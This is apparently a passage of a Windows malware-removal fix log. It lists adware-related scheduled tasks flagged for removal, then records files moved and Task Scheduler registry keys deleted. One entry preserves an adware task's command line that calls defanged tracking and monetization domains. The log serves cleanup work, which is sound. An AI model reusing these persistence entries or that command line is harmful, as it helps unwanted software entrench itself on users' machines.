Task: {DF32B448-D147-4112-BD7A-42CE73002440} - \b0220ba6-09e4-46a8-8a55-a353b242b387-5_user -> No File <==== ATTENTION 
Task: {E0604DBE-BA0E-4E4B-89E1-D187C4AC4E00} - \Web Protector Plus Server -> No File <==== ATTENTION 
Task: {E14EB690-DAB0-4B1E-9DAB-E847276BB426} - \9a453951-0637-4363-87cf-6eacfdd0bf82-4 -> No File <==== ATTENTION 
Task: {E16003EC-4060-4D1A-854D-9D83E7FD6A9F} - \Plus-HD-1.2-chromeinstaller -> No File <==== ATTENTION 
Task: {E79DDE3A-283A-4EB8-A8DB-25A3F1E10FBC} - System32\Tasks\0 => Iexplore.exe <==== ATTENTION 
Task: {E875ED51-1937-4C3B-AC7B-955A7F2597E6} - \9a453951-0637-4363-87cf-6eacfdd0bf82-5 -> No File <==== ATTENTION 
Task: {E9567459-8EA7-45F8-AA7E-37D353BC0D26} - System32\Tasks\e6a4b65b-e1dc-4d98-84ce-5654a35812c9 => C:\Program Files (x86)\video MediaPlay-Air\223cecce-1b0c-40e4-94c0-10568c9d47b2-4.exe <==== ATTENTION 
Task: {EA444C25-CCA5-4E11-B3FB-525A4D9815AB} - \3315ae47-db79-4ea6-b347-a4b2fa3cb91c-10_user -> No File <==== ATTENTION
Task: {EAA7CAC6-0B86-4AEA-9609-81B789D98898} - System32\Tasks\LaunchApp => C:\Program Files (x86)\MyPC Backup\MyPC Backup.exe <==== ATTENTION 
Task: {EC6FCC38-4691-4971-AD83-9406D152762E} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-1-7 -> No File <==== ATTENTION 
Task: {ED5CE69B-9BEF-4534-B5F8-CD520A9271C6} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-5 -> No File <==== ATTENTION 
Task: {F078B885-FC60-448B-ACE0-DB8A472369CD} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-4 -> No File <==== ATTENTION 
Task: {F53EBC0B-5EDE-4C12-8DAC-BA41281AB0F0} - \22a55d69-9f00-4e39-9983-8a08b1069524-5_user -> No File <==== ATTENTION 
Task: {FA70133E-BDAB-4027-9671-68531A9920DA} - \9a453951-0637-4363-87cf-6eacfdd0bf82-5_user -> No File <==== ATTENTION 
Task: {EAA7CAC6-0B86-4AEA-9609-81B789D98898} - System32\Tasks\LaunchApp => C:\Program Files (x86)\MyPC Backup\MyPC Backup.exe <==== ATTENTION 
Task: {EC6FCC38-4691-4971-AD83-9406D152762E} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-1-7 -> No File <==== ATTENTION 
Task: {ED5CE69B-9BEF-4534-B5F8-CD520A9271C6} - \223cecce-1b0c-40e4-94c0-10568c9d47b2-5 -> No File <==== ATTENTION 
Task: {F078B885-FC60-448B-ACE0-DB8A472369CD} - \cd8b5ea5-4405-44da-98c0-6646dc55b0e1-4 -> No File <==== ATTENTION 
Task: {F53EBC0B-5EDE-4C12-8DAC-BA41281AB0F0} - \22a55d69-9f00-4e39-9983-8a08b1069524-5_user -> No File <==== ATTENTION 
Task: {FA70133E-BDAB-4027-9671-68531A9920DA} - \9a453951-0637-4363-87cf-6eacfdd0bf82-5_user -> No File <==== ATTENTION 
Task: C:\Windows\Tasks\e6a4b65b-e1dc-4d98-84ce-5654a35812c9.job => C:\Program Files (x86)\video MediaPlay-Air\223cecce-1b0c-40e4-94c0-10568c9d47b2-4.exe <==== ATTENTION 
Task: C:\Windows\Tasks\FQfcQIFiv3.job => C:\Users\Nexus Media Server\AppData\Roaming\FQfcQIFiv3.exe <==== ATTENTION
Task: C:\Windows\Tasks\web_disco_notification_service.job => C:\Program Files (x86)\web disco\web_disco_notification_service.exeǥ/url='hxxp:/cdn.selectbestopt.com/notf_sys/index.html' /crregname='web disco' /appid='73143' /srcid='2913' /bic='c2622811f82ea9bcabadfd7993fe0e7c' /verifier='f674d3cc28017886611145c5672056c8' /installerversion='1.50.3.10' /statsdomain='hxxp:/stats.buildomserv.com/data.gif?' /errorsdomain='hxxp:/stats.buildomserv.com/data.gif?' /monetizationdomain='hxxp:/logs.buildomserv.com/monetization.gif <==== ATTENTION
end
*****************
 
Restore point was successfully created.
C:\Program Files (x86)\mozilla firefox\browser\defaults\preferences\my-prefs.js => moved successfully
C:\Program Files (x86)\mozilla firefox\my.cfg => moved successfully
"C:\Users\Nexus Media Server\AppData\Local\Temp\10862.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\14750.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\19124.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\19388.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\6330.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\71569_updater.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\72893_updater.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\CitrixOnlineLauncher.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\InstallUtil.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\of3w9136.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\Setup_132952.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\ShopperProJSINJFull.exe" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\SpOrder.dll" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\tmpddewfv.dll" => not found.
"C:\Users\Nexus Media Server\AppData\Local\Temp\Uninstall.exe" => not found.
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{004783C0-9EA6-4286-9A05-E1787A0640AF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{004783C0-9EA6-4286-9A05-E1787A0640AF}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\223cecce-1b0c-40e4-94c0-10568c9d47b2-3 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{07202880-E71A-4494-90F4-574EA2ED61F3}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{07202880-E71A-4494-90F4-574EA2ED61F3}" => key removed successfully
C:\Windows\System32\Tasks\FQfcQIFiv3 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FQfcQIFiv3" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{08FF94D8-344C-4F30-BFB8-93A4C5C12220}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{08FF94D8-344C-4F30-BFB8-93A4C5C12220}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\winter_web_updating_service => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{0AA08E94-3F52-4F9D-A4A8-6EE26ECF36FA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0AA08E94-3F52-4F9D-A4A8-6EE26ECF36FA}" => key removed successfully
C:\Windows\System32\Tasks\cCDRV5n4y => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cCDRV5n4y" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{0E3C542A-35A3-40E0-ACE2-9126251072DD}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0E3C542A-35A3-40E0-ACE2-9126251072DD}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\22a55d69-9f00-4e39-9983-8a08b1069524-1 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{106DC799-0B98-42D6-BCB4-3AC29DDAEC4A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{106DC799-0B98-42D6-BCB4-3AC29DDAEC4A}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\3315ae47-db79-4ea6-b347-a4b2fa3cb91c-1-7 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{10E01498-6644-4F73-B841-C1F525FFB3CF}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{10E01498-6644-4F73-B841-C1F525FFB3CF}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\APSnotifierPP3 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{117EF788-AC55-498B-BB16-289EADC64420}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{117EF788-AC55-498B-BB16-289EADC64420}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\b917f354-73c6-437f-845a-847de7226630-1 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{11B20385-ACA6-459C-97EC-FE76D7101045}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{11B20385-ACA6-459C-97EC-FE76D7101045}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\mr_fun_updating_service => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1532EB26-4300-4818-BC84-C216413D6961}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1532EB26-4300-4818-BC84-C216413D6961}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\winter_web_notification_service => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{1CF5901D-E3A5-4F4E-9DCD-9E35A532D005}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1CF5901D-E3A5-4F4E-9DCD-9E35A532D005}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Test TimeTrigger => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1E72DAC7-DBD4-4E7A-80C4-D07E7D1C4B1C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1E72DAC7-DBD4-4E7A-80C4-D07E7D1C4B1C}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\b917f354-73c6-437f-845a-847de7226630-4 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1F33128F-00A1-42D0-9781-2ED1A35FFEAC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1F33128F-00A1-42D0-9781-2ED1A35FFEAC}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\223cecce-1b0c-40e4-94c0-10568c9d47b2-4 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{1FA7F172-78F3-4EFB-B4DA-060CB9CC7CD9}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{1FA7F172-78F3-4EFB-B4DA-060CB9CC7CD9}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-codedownloader => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{23DC0715-9230-40B6-8FB8-EDBBCE7A7A75}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{23DC0715-9230-40B6-8FB8-EDBBCE7A7A75}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Plus-HD-1.2-updater => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{28646BCD-AA5A-4084-91D0-9C4E529B0FB6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{28646BCD-AA5A-4084-91D0-9C4E529B0FB6}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\web_disco_updating_service => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{2B6E52E0-F459-43DE-8D0E-0337660B3F7E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2B6E52E0-F459-43DE-8D0E-0337660B3F7E}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Groovorio Updater => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2C8ACB8D-6D9B-4739-9DBE-515789E81AB0}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2C8ACB8D-6D9B-4739-9DBE-515789E81AB0}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cd8b5ea5-4405-44da-98c0-6646dc55b0e1-1-6 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{2E10B7D0-E7AE-4BE1-9595-4EA395F4B8BE}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2E10B7D0-E7AE-4BE1-9595-4EA395F4B8BE}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\3315ae47-db79-4ea6-b347-a4b2fa3cb91c-1-6 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{313D31B2-A09D-4CA3-9C36-4B082D485326}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{313D31B2-A09D-4CA3-9C36-4B082D485326}" => key removed successfully
C:\Windows\System32\Tasks\{3C3CCF23-D2A6-1550-6302-F9C39BC5A975} => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{3C3CCF23-D2A6-1550-6302-F9C39BC5A975}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37792BD1-5684-4410-B0BF-5B96C495EEFC}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37792BD1-5684-4410-B0BF-5B96C495EEFC}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\AmiUpdXp => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{37D64102-43DC-4669-9D5F-C440AEB03087}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{37D64102-43DC-4669-9D5F-C440AEB03087}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\22a55d69-9f00-4e39-9983-8a08b1069524-11 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{38F1EC87-431A-499C-A34D-8B09A2FC0DEA}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{38F1EC87-431A-499C-A34D-8B09A2FC0DEA}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ConsumerInputUpdateTaskMachineUA => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3B372DA0-1811-4CD3-9E1D-D3D2D4EC3173}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3B372DA0-1811-4CD3-9E1D-D3D2D4EC3173}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\223cecce-1b0c-40e4-94c0-10568c9d47b2-11 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3C43E890-7B99-4AD9-9AF3-37569885100E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3C43E890-7B99-4AD9-9AF3-37569885100E}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BlockAndSurf_wd => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{3EFFE333-49F0-4306-B0A4-80D42EE62B66}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{3EFFE333-49F0-4306-B0A4-80D42EE62B66}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Web Protector Plus => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{40AB5D2F-AF98-458F-9470-4316D56135B6}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{40AB5D2F-AF98-458F-9470-4316D56135B6}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\BlockAndSurf Update => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{42ACA34C-C760-4936-8119-668BB10B8B0E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42ACA34C-C760-4936-8119-668BB10B8B0E}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\223cecce-1b0c-40e4-94c0-10568c9d47b2-1 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{42C3BC7F-B50D-437C-83C9-B6565D8B745F}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42C3BC7F-B50D-437C-83C9-B6565D8B745F}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\223cecce-1b0c-40e4-94c0-10568c9d47b2-5_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{42CD00F7-4928-4363-98D3-0824CA05303D}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{42CD00F7-4928-4363-98D3-0824CA05303D}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\22a55d69-9f00-4e39-9983-8a08b1069524-5 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4466149E-D043-464C-B732-93424DF9FC68}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4466149E-D043-464C-B732-93424DF9FC68}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\ShopperPro => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{461C2034-2B07-43E8-83E4-31D7F5CD20C5}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{461C2034-2B07-43E8-83E4-31D7F5CD20C5}" => key removed successfully
C:\Windows\System32\Tasks\Microsoft\Windows\Multimedia\SMupdate3 => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Multimedia\SMupdate3" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4AF98EF8-6984-4E90-BB7F-01FE7746F0D7}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4AF98EF8-6984-4E90-BB7F-01FE7746F0D7}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\b0220ba6-09e4-46a8-8a55-a353b242b387-1-6 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{4B844AAB-C755-40E4-9068-7879730FDC6B}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4B844AAB-C755-40E4-9068-7879730FDC6B}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SPBIW_UpdateTask_Time_333630343534353131342d235b783432415b45345a2d6c => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4BE81A3B-C5B7-45B8-B831-22723BEA8F81}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4BE81A3B-C5B7-45B8-B831-22723BEA8F81}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\a250569a-98c2-4048-95cc-84eb2edcd0f9-5_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4DB861DF-AAAB-4E4F-AC9A-1F92599AD489}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4DB861DF-AAAB-4E4F-AC9A-1F92599AD489}" => key removed successfully
C:\Windows\System32\Tasks\web_disco_notification_service => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\web_disco_notification_service" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{58570255-9E70-4643-998F-F9055538D54C}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{58570255-9E70-4643-998F-F9055538D54C}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\globalUpdateUpdateTaskMachineCore => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{59637119-1492-4349-BE78-8631BEE643C8}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{59637119-1492-4349-BE78-8631BEE643C8}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SMupdate1 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{5DA016D9-C794-4139-BF27-5ACAD8CDBB2E}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{5DA016D9-C794-4139-BF27-5ACAD8CDBB2E}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\b0220ba6-09e4-46a8-8a55-a353b242b387-5 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{62FDB5B3-BF42-432F-BE5C-356D2481019A}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{62FDB5B3-BF42-432F-BE5C-356D2481019A}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\APSnotifierPP2 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{63472255-BB01-4824-A8D9-B9C82D1C6A02}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{63472255-BB01-4824-A8D9-B9C82D1C6A02}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\cd8b5ea5-4405-44da-98c0-6646dc55b0e1-10_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{6517AD94-3943-4B6C-993C-EACA97408A23}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{6517AD94-3943-4B6C-993C-EACA97408A23}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Smp => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{65C4EF77-BB66-4D8E-9C39-2F4489171801}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{65C4EF77-BB66-4D8E-9C39-2F4489171801}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Crossbrowse => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{712E5CBF-BCAC-48B5-93EC-17629C62F300}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{712E5CBF-BCAC-48B5-93EC-17629C62F300}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\3315ae47-db79-4ea6-b347-a4b2fa3cb91c-5_user => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{781C8DC9-CB04-4B90-9CE2-6291058A0589}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{781C8DC9-CB04-4B90-9CE2-6291058A0589}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\globalUpdateUpdateTaskMachineUA => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{798B4FF4-BC44-4454-911C-7304F1140372}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{798B4FF4-BC44-4454-911C-7304F1140372}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\b0220ba6-09e4-46a8-8a55-a353b242b387-1-7 => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7CBB73C0-D878-4BD1-9424-77D2B5C9AD57}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7CBB73C0-D878-4BD1-9424-77D2B5C9AD57}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SMWUpd => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7E01AD6B-5B26-471E-A0A8-CDF27242E872}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7E01AD6B-5B26-471E-A0A8-CDF27242E872}" => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SPDriver => key not found. 
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7E430EB2-F0D4-45B6-912A-3C11D787E54F}" => key removed successfully
